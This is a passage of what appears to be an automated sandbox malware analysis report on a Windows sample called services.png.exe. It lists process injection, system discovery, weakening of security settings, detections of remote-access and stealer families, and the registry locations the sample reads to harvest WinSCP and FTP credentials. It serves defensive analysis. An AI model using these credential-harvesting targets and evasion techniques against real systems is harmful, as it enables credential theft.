Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2E31778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2E3178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2E31BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2E31BF4	Jump to behavior

Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe

Process created: unknown unknown

Jump to behavior

Source: C:\Users\user\Desktop\services.png.exe

Code function: 0_2_004364CE InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetSecurityDescriptorDacl,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,GetSecurityDescriptorDacl,SetSecurityDescriptorDacl,LocalFree,

0_2_004364CE

Source: C:\Users\user\Desktop\services.png.exe

Code function: 0_2_00436777 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00436777

Source: sihost.exe, 00000002.00000002.2969522349.000001CD41220000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000002.00000000.1730947021.000001CD41220000.00000002.00000001.00040000.00000000.sdmp, svchost.exe, 00000003.00000000.1732811941.00000151A5060000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: sihost.exe, 00000002.00000002.2969522349.000001CD41220000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000002.00000000.1730947021.000001CD41220000.00000002.00000001.00040000.00000000.sdmp, svchost.exe, 00000003.00000000.1732811941.00000151A5060000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: ctfmon.exe, 00000005.00000000.1737537430.000001F288C93000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd"
Source: explorer.exe, 00000006.00000000.1740112568.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2933946089.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman$
Source: sihost.exe, 00000002.00000002.2969522349.000001CD41220000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000002.00000000.1730947021.000001CD41220000.00000002.00000001.00040000.00000000.sdmp, svchost.exe, 00000003.00000000.1732811941.00000151A5060000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: ctfmon.exe, 00000005.00000000.1737537430.000001F288C93000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWndH
Source: sihost.exe, 00000002.00000002.2969522349.000001CD41220000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000002.00000000.1730947021.000001CD41220000.00000002.00000001.00040000.00000000.sdmp, svchost.exe, 00000003.00000000.1732811941.00000151A5060000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Language, Device and Operating System Detection

Yara detected Telegram Recon

Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\UIServices[1].exe, type: DROPPED

Source: C:\Windows\System32\sihost.exe

Code function: 2_2_000001CD40E536F0 cpuid

2_2_000001CD40E536F0

Source: C:\Users\user\Desktop\services.png.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133827958360907922.txt VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\services.png.exe

Code function: 0_2_00431187 GetSystemTime,SystemTimeToFileTime,

0_2_00431187

Source: C:\Users\user\Desktop\services.png.exe

Code function: 0_2_0041D37D GetTickCount,GetUserDefaultUILanguage,GetModuleFileNameW,GetUserNameExW,

0_2_0041D37D

Source: C:\Users\user\Desktop\services.png.exe

Code function: 0_2_004311AF GetTimeZoneInformation,

0_2_004311AF

Source: C:\Users\user\Desktop\services.png.exe

Code function: 0_2_0041F74B GetComputerNameW,GetVersionExW,

0_2_0041F74B

Source: C:\Users\user\Desktop\services.png.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Yara detected AsyncRAT

Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\UIServices[1].exe, type: DROPPED

Disables Internet Explorer cookie cleaning (a user can no longer delete cookies)

Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Privacy CleanCookies

Modifies Internet Explorer zone settings

Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 1406
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 1609
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 1406
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 1609

Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SECURITYCENTER2 : SELECT * FROM FirewallProduct
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SECURITYCENTER2 : SELECT * FROM AntivirusProduct

Source: services.png.exe

Binary or memory string: S:(ML;;NRNWNX;;;LW)D:(A;;0x1FFFFF;;;WD)(A;;0x1FFFFF;;;AC)

Stealing of Sensitive Information

Yara detected StormKitty Stealer

Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\UIServices[1].exe, type: DROPPED

Yara detected Telegram RAT

Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\UIServices[1].exe, type: DROPPED

Yara detected WorldWind Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\UIServices[1].exe, type: DROPPED

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\martin prikryl\winscp 2\sessions

Tries to harvest and steal ftp login credentials

Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	File opened: HKEY_CURRENT_USER\SOFTWARE\Far2\Plugins\ftp\hosts
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	File opened: HKEY_CURRENT_USER\SOFTWARE\smartftp\client 2.0\settings\general\favorites
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	File opened: HKEY_CURRENT_USER\SOFTWARE\Far\Plugins\ftp\hosts
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	File opened: HKEY_CURRENT_USER\SOFTWARE\smartftp\client 2.0\settings\backup

Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\UIServices[1].exe, type: DROPPED

Remote Access Functionality

Yara detected Hancitor

Source: Yara match

File source: Process Memory Space: nyheukpo.exe PID: 1460, type: MEMORYSTR

Yara detected StormKitty Stealer

Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\UIServices[1].exe, type: DROPPED

Yara detected Telegram RAT

Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\UIServices[1].exe, type: DROPPED

Yara detected WorldWind Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\UIServices[1].exe, type: DROPPED

Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_00436311 socket,bind,closesocket,	0_2_00436311
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_00435FF8 socket,bind,listen,closesocket,	0_2_00435FF8
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_02846311 socket,bind,#3,	0_2_02846311
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_02845FF8 socket,bind,listen,#3,	0_2_02845FF8
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Code function: 1_2_00435FF8 socket,bind,listen,closesocket,	1_2_00435FF8
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Code function: 1_2_00436311 socket,bind,closesocket,	1_2_00436311

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	11 Windows Management Instrumentation	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	2 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	24 Native API	1 Valid Accounts	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 Credential API Hooking	1 Account Discovery	Remote Desktop Protocol	2 Browser Session Hijacking	12 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Valid Accounts	221 Obfuscated Files or Information	11 Input Capture	4 File and Directory Discovery	SMB/Windows Admin Shares	1 Data from Local System	21 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Registry Run Keys / Startup Folder	11 Access Token Manipulation	1 Install Root Certificate	1 Credentials in Registry	134 System Information Discovery	Distributed Component Object Model	1 Credential API Hooking	11 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	512 Process Injection	11 Software Packing	LSA Secrets	1 Network Share Discovery	SSH	11 Input Capture	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Scheduled Task/Job	1 Timestomp	Cached Domain Credentials	1 Query Registry	VNC	1 Clipboard Data	24 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	1 Registry Run Keys / Startup Folder	1 DLL Side-Loading	DCSync	331 Security Software Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	11 Virtualization/Sandbox Evasion	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	4 Rootkit	/etc/passwd and /etc/shadow	3 Process Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	11 Masquerading	Network Sniffing	1 Application Window Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Valid Accounts	Input Capture	1 System Owner/User Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	11 Virtualization/Sandbox Evasion	Keylogging	1 System Network Configuration Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking
Determine Physical Locations	Virtual Private Server	Compromise Hardware Supply Chain	Unix Shell	Systemd Timers	Systemd Timers	2 Modify Registry	GUI Input Capture	Permission Groups Discovery	Replication Through Removable Media	Email Collection	Proxy	Exfiltration over USB	Network Denial of Service
Business Relationships	Server	Trusted Relationship	Visual Basic	Container Orchestration Job	Container Orchestration Job	11 Access Token Manipulation	Web Portal Capture	Local Groups	Component Object Model and Distributed COM	Local Email Collection	Internal Proxy	Commonly Used Port	Direct Network Flood
Identify Business Tempo	Botnet	Hardware Additions	Python	Hypervisor	Process Injection	512 Process Injection	Credential API Hooking	Domain Groups	Exploitation of Remote Services	Remote Email Collection	External Proxy	Transfer Data to Cloud Account	Reflection Amplification
Identify Roles	Web Services	Masquerade as Legitimate Application	JavaScript	Valid Accounts	Dynamic-link Library Injection	1 Hidden Files and Directories	Brute Force	Cloud Groups	Attack PC via USB Connection	Email Forwarding Rule	Multi-hop Proxy	Exfiltration Over Web Service	Endpoint Denial of Service

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report services.png.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
services.png.exe